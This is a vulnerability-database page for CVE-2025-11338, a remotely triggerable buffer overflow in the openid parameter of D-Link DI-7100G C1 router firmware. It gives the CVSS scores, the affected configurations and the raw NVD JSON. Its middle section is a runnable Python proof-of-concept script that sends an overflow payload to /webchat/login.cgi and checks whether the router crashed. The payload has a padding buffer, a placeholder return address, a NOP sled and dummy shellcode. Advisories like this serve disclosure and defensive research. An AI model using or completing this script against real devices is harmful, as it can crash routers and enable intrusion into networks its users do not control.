Security Vulnerability Report
中文
CVE-2025-11338 CVSS 8.8 HIGH

CVE-2025-11338

Published: 2025-10-06 16:15:33
Last Modified: 2025-11-19 21:48:49
Source: [email protected]

Description

A flaw has been found in D-Link DI-7100G C1 up to 20250928. This vulnerability affects the function sub_4C0990 of the file /webchat/login.cgi of the component jhttpd. Executing manipulation of the argument openid can lead to buffer overflow. It is possible to launch the attack remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:di-7100g_c1_firmware:2025-09-28:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:di-7100g_c1:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DI-7100G C1 <= 20250928

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-11338 - D-Link DI-7100G C1 Buffer Overflow PoC # Vulnerability: Buffer overflow in sub_4C0990 via openid parameter # Target: /webchat/login.cgi import requests import sys from struct import pack TARGET_HOST = "http://192.168.0.1" TARGET_PATH = "/webchat/login.cgi" BUFFER_SIZE = 1024 # Adjust based on actual buffer size def generate_payload(): """Generate buffer overflow payload targeting openid parameter""" # Padding to fill buffer padding = b"A" * BUFFER_SIZE # Overwrite saved return address (example: address in jhttpd) # Adjust based on actual binary analysis ret_address = pack("<I", 0x42424242) # NOP sled + shellcode placeholder nop_sled = b"\x90" * 64 # Shellcode would be inserted here (e.g., MIPS shellcode for D-Link) shellcode = b"\xcc" * 128 payload = padding + ret_address + nop_sled + shellcode return payload def exploit(target_url): """Send exploit payload to vulnerable endpoint""" url = target_url + TARGET_PATH payload = generate_payload() headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } # The openid parameter is vulnerable to buffer overflow data = { "openid": payload.decode('latin-1'), "username": "admin", "password": "admin" } try: response = requests.post(url, data=data, headers=headers, timeout=10) print(f"[*] Response status: {response.status_code}") print(f"[*] Response length: {len(response.content)}") # Check if service crashed try: check = requests.get(target_url, timeout=5) if check.status_code == 0 or check.status_code >= 500: print("[+] Target appears to be crashed - exploit may have succeeded") else: print("[-] Target still responding normally") except: print("[+] Target is unresponsive - exploit may have succeeded") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = TARGET_HOST print(f"[*] Targeting: {target}") print(f"[*] CVE-2025-11338 - D-Link DI-7100G C1 Buffer Overflow") exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11338", "sourceIdentifier": "[email protected]", "published": "2025-10-06T16:15:33.497", "lastModified": "2025-11-19T21:48:49.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in D-Link DI-7100G C1 up to 20250928. This vulnerability affects the function sub_4C0990 of the file /webchat/login.cgi of the component jhttpd. Executing manipulation of the argument openid can lead to buffer overflow. It is possible to launch the attack remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:di-7100g_c1_firmware:2025-09-28:*:*:*:*:*:*:*", "matchCriteriaId": "7A967144-1055-4FC2-97F7-8E486F6D6D53"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:di-7100g_c1:-:*:*:*:*:*:*:*", "matchCriteriaId": "B661C392-F07F-4BF5-B559-B00693C63E94"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.327221", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327221", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664619", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.yuque.com/jh0ng/vmpda6/kggo2ngrcphzvwml", "source": "[email protected]", "tags": ["Permissions Required"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.